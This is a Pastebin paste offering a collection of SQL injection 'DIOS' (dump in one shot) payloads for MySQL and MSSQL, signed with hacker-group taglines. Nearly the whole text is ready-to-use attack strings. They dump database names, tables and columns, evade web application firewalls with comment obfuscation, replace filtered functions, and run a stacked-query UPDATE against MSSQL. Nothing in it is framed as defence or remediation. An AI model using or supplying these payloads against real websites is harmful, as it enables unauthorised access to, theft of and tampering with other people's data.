API tools faq
paste
Advertisement
Himeshvyas26

SOME DIOS COLLECTION

Himeshvyas26
Sep 15th, 2018
393
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.36 KB | None | 0 0
raw download clone embed print report
  1. Some Information for SQL injection Lovers & some DIOS
  2. Very Helpful Dios <3
  3. Https://facebook.com/indiancyberheros
  4. ======================
  5. 1. Make_set DIOS without concat,concat_ws,group_concat
  6. =======================
  7. make_set(3,0x3c666f6e7420636f6c6f723d7265642073697a653d353e7377656574796f772c2c,version()),make_set(6,@sweet:=database(),(select 1 from(information_schema.tables)where(table_schema=database())and@sweet:=make_set(15,@sweet,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d333e,table_name,0x3c2f666f6e743e)),@sweet)
  8. ===============================
  9. 2.make_set DIOS with concat_ws
  10. ===============================
  11. CONCAT_WS(0x3c666f6e7420636f6c6f723d7265643e,0x3c623e,0x3c666f6e7420636f6c6f723d677265656e2073697a653d353e496e6a656374656420427920436c6f7564792056697275733c62723e3c2f666f6e743e,0x3c62723e,0x55736572203a20,system_user(),0x3c62723e,0x4461746162617365203a20,schema(),0x3c62723e,0x56657273696f6e203a20,innodb_version(),0x2d,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c666f6e7420636f6c6f723d2723,rand()*100000,0x3c6c693e,table_name,column_name)),@))
  12. ==================================
  13. 3. Print name without using 'amir',hex,mysqlchar,binary,or any thing :D
  14. ==================================
  15. concat(conv(20,10,36),conv(10,10,32),conv(28,10,36),conv(17,10,36),conv(22,10,36),conv(18,10,36),conv(27,10,36),conv(18,10,36),0x20,conv(12,10,36),conv(17,10,36),conv(14,10,36),conv(14,10,36),conv(29,10,36),conv(10,10,36),conv(17,10,36),'<br>')
  16. ===================================
  17. 4. alternative of information_schema.tables||.columns
  18. ==================================
  19. information_schema.key_column_usage information_schema.table_constraints information_schema.Partitions
  20. ===================================
  21. 5. update injection in mssql
  22. ==========================
  23. ; update table_name set detailText=db_name() where id=22
  24. =============================
  25. 6. XML or error base DIOS in MSSQL
  26. ============================
  27. 'Injected by Kashmiri Cheetah'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
  28. ================================
  29. 7. Variable Method WAF DIOS
  30. ================================
  31. @x:=concat+(0x3c703e3c623e3c693e3c666f6e7420636f6c6f723d7265643e496e6a656374656420627920536f68616d3c2f666f6e743e3c2f693e3c2f623e3c2f703e,0x3c62723e, database/*a*/(),0x3c62723e,version/*a*/(),0x3c62723e,@:=0,(select+count(*)/*!50000from*/ /*!00000information_schema*/.columns+where+table_schema=/*!00000database*/()+and@:=concat+(@,0x3c6c693e,/*!00000table_name*/,0x3a3a,/*!00000column_name*/)),@)/
  32. =================================
  33. 8. version without version() and @@version
  34. =================================
  35. (select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)
  36. ==================================
  37. 9. Count without Count function
  38. ===================================
  39. databases:
  40. concat( (select (@x) from (select (@x:=0),(@dbcount:=0), (select (0) from (information_schema.schemata) where (0x00) in (@x:=concat(@x,if(@dbcount:=@dbcount%2b1,0x0,0x0) ))))x), 'DB Count is : ',@dbcount)
  41. tables:
  42. concat( (select (@x) from (select (@x:=0),(@tblcount:=0), (select (0) from (information_schema.tables) where table_schema=database()and (0x00) in (@x:=concat(@x,if(@tblcount:=@tblcount%2b1,0x0,0x0) ))))x), 'Tables Count is : ',@tblcount)
  43. columns:
  44. concat( (select (@x) from (select (@x:=0),(@CLMcount:=0), (select (0) from information_Schema.columns where table_schema=database()and (0x00) in (@x:=concat(@x,if(column_name,0x00,0x00),if(@CLMcount:=@CLMcount%2b1,0x0,0x0) ))))x), 'Columns Count is : ',@CLMcount)
  45. ==========================================
  46. 10. Sort tables Ascending order as per record
  47. ==========================================
  48. a. with "COALESCE" Function
  49. =================
  50. concat%280x3c666f6e7420636f6c6f723d707572706c653e3c623e3c693e436865657461682048657265203a3a20,@@version,0x3c62723e,0x3c62723e,%28SELECT+GROUP_CONCAT%28table_name,0x203a3a20,COALESCE%28table_rows,0%29+order+by+COALESCE%28table_rows,0%29+ASC+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%29
  51. ======
  52. b. with "IFNULL" function
  53. ======
  54. concat(0x3c666f6e7420636f6c6f723d707572706c653e3c623e3c693e436865657461682048657265203a3a20,@@version,0x3c62723e,0x3c62723e,(SELECT+GROUP_CONCAT(table_name,0x203a3a20,ifnull(table_rows,0)+order+by+ifnull(table_rows,0)+ASC+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()))
  55. ========
  56. c. with declaring variable methods
  57. =========
  58. concat(@x:=0x0,@oldtable:=0x0,@num:=0,benchmark((select count(*) from information_schema.tables where table_schema=database()),@x:=concat(@x,0x3c6c693e,(select concat(@num:=@num%2b1,0x2920,tbl,0x203a3a20,rows, if(@oldtable:=concat(@oldtable,0x2C,tbl),0x0,0x0)) from (select table_name as tbl,table_rows as rows from information_schema.tables where table_schema=database() order by table_rows DESC)Cheetah where FIND_IN_SET(tbl, @oldtable)=0 limit 1))),@x)
  59. ===========================================
  60. 11. Sort tables Desc order as per record
  61. ============================================
  62. concat(@x:=0x0,@oldtable:=0x0,@num:=0,benchmark((select count(*) from information_schema.tables where table_schema=database()),@x:=concat(@x,0x3c6c693e,(select concat(@num:=@num%2b1,0x2920,tbl,0x203a3a20,rows, if(@oldtable:=concat(@oldtable,0x2C,tbl),0x0,0x0)) from (select table_name as tbl,table_rows as rows from information_schema.tables where table_schema=database() order by table_rows DESC)Cheetah where FIND_IN_SET(tbl, @oldtable)=0 limit 1))),@x)
  63. ===========================================
  64. 12. The Smallest and Simplest DIOS Ever ;)
  65. ===========================================
  66. concat(@:=0,(select count(*)from information_schema.columns where@:=concat(@,'<p>',table_name,':',column_name)),@)
  67. ============================================
  68. 13. TWIN Injection DIOS
  69. ============================================
  70. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)
  71. ===========================================
  72. ~collection by H4M4573R
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!